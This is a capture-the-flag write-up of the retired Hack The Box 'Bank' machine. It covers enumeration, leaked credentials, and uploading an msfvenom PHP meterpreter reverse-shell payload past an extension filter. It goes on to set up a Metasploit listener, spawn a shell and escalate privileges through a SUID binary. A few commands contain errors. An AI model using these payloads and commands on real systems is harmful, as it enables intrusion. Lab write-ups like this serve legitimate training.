Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real world scenarios and some of them lean more towards a CTF style of challenge.

Note. Only write-ups of retired HTB machines are allowed.


Bank is a relatively simple machine, however proper web enumeration is key to finding the necessary data for entry

We will use the following tools to pawn the box on a Kali Linux box:

  • nmap
  • gobuster
  • Searchsploit
  • msfconsole
  • metasploit
  • meterperter
  • LinEnum

Let's get started.

Step 1 - Reconnaissance

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as you can.

Port scanning

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.


I use the following command to perform an intensive scan:

nmap -A -v bank.htb

-A: Enable OS detection, version detection, script scanning, and traceroute

-v: Increase verbosity level

bank.htb: hostname for the Bank box

If you find the results a little bit too overwhelming, you can do another command to get only the open ports.

nmap bank.htb

We can see that there are 3 open ports:

Port 22, Secure Shell (SSH), secure logins, file transfers (scp, sftp) and port forwarding

Port 53, Domain Name System (DNS)

Port 80, most often used by Hypertext Transfer Protocol (HTTP)

Directory scanning

I use Gobuster. Gobuster is a directory scanner written in Go. More info on the tool here. Gobuster uses wordlists on Kali which are located in the /usr/share/wordlists directory. I'm using wordlists from dirb and dirbuster, but you can download more wordlists from SecLists here

I use this command for the dirb common.txt wordlist

gobuster dir -u bank.htb -w /usr/share/wordlists/dirb/common.txt

I can see some interesting folders. I do another directory scan with a different wordlist.

gobuster dir -u bank.htb -w /usr/share/worldlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Step 2 - Visiting the web page

From the reconnaissance phase, I decide to start with port 80. It points to an Apache2 Ubuntu Default page. We need to set the hostname. We will follow the standard convention for the HTB machines, bank.htb


I add bank on the /etc/hosts file

nano /etc/hosts

with     bank.htb

I check the file with

cat /etc/hosts

When I navigate to bank.htb, I can see a login page now


From the gobuster reconnaissance, I found some folders. I navigate to /balance-transfer


I have a look at a couple of files. All the files seems to have the full name, email and password encrypted.


I go back to the main page and I click on the Size tab to sort the transfers. I can see that one of the file is different


When I click on the file, I see an error message at the top. The encryption failed for this file. I can see all the details in plain text


I go back to the login panel and enter the credentials. I now have access to the dashboard of the HTB Bank. Nothing interesting on this page, so I move to the Support page


On the Support page, I can upload files. I will try to upload a payload


Step 3 - Using MSFvenom to craft an exploit

We will use MSFvenom, which is a payload generator . You can learn more about it here


But first, let's see on Metasploit Framework which payload we could use to craft our exploit

We know that we need to create a reverse shell, which is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.


The reverse TCP shell should be for PHP and we will use Meterpreter

From the Offensive Security website, we get this definition for Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

You can read more about Meterpreter here


I launch Metasploit and search for reverse TCP payloads. I use the following command

search php meterpreter reverse_tcp

I find an interesting payload, number 594, which is a Reverse TCP Stager. This payload injects the meterpreter server DLL via the Reflective Dll Injection payload and connects back to the attacker


Now let's go back to msfvenom to craft our exploit


I use the following command

msfvenom -p php/meterpreter/reverse_tcp lhost= lport=443 -f raw > HTBbankshell.php

I then check with ls if the file has been created


and I cat the file to see the exploit with

cat HTBbankshell.php

I go back to the support page. I add the title, the message and upload the file on the form


I click on the submit button and I see an error message. The file type doesn't seem to work


I check the source code and I see a comment that indicates that the file extension .htb is needed to execute php for debugging purposes only


I then change the extension of my payload from HTBbankshell.php to HTBbankshell.htb


My file is now ready to be uploaded on the support page


And it seems to work! The payload has been uploaded on the support page


Step 4 - Setting up a listener with Metasploit

Back on Metasploit where I use the following command to set the payload handler

use exploit/multi/handler

I first set up the payload

set payload php/meterpreter/reverse_tcp

Then the LHOST

set lhost

And finally the LPORT

set lport 4444

If we check the options now, we should see that everything is set up


Let's run the exploit.

After this message appears

Started reverse TCP handler on

go back to the browser and refresh the page where the malicious script is hosted


You should then see a Meterpreter session created


I start by gathering some information with getuid which returns the real user ID of the calling process and sysinfo


Step 5 - Looking for the user.txt flag

I start navigating to root and list the folders/files.


I move to the home directory with

cd home

And I can see a user called chris


I move to the chris directory and when I list the files...


I find the user.txt file! To read the content of the file I use the command

cat user.txt

Now that we have the user flag, let's find the root flag!

Step 6 - Performing Privilege Escalation

I try to navigate to the root folder and the access is denied


I will use LinEnum to enumerate more information from this machine. LinEnum is used for scripted local Linux enumeration and privilege escalation checks. More info here

I fetch LinEnum from GitHub with

wget https://https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

I check with this command if the script has been correctly fetched

ls -la

I use the following command

chmod 777 LinEnum.sh

to change the file permission and make it readable, writable and executable by everyone


Within meterpreter I check the location of the file with

lls -S "LinEnum.sh"

I start a php server on another terminal with

php -S

I type the following command to get a standard shell on the target system


I spawn a TTY shell with

python3 -c 'import pty;pty.spawn("/bin/bash/")'

And I transfer the file to the machine with

wget -O /tmp/LinEnum.sh

where I copy the file from my Kali box to the machine temp folder


I then navigate to the temp folder to check if the file has been correctly moved


I then run the script with

sh ./LinEnum.sh

The scan gives me a lot of information. I look for the interesting files section. I check the SUID files section. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it

I spot an interesting file


I navigate to var/htb/emergency


I run it with


and I'm asked if I want to get a root shell :)


I have root access to the machine


I can now navigate to the root folder


I find the root.txt file!

To read the content of the file I use the command

cat root.txt

Congrats! You found both flags!

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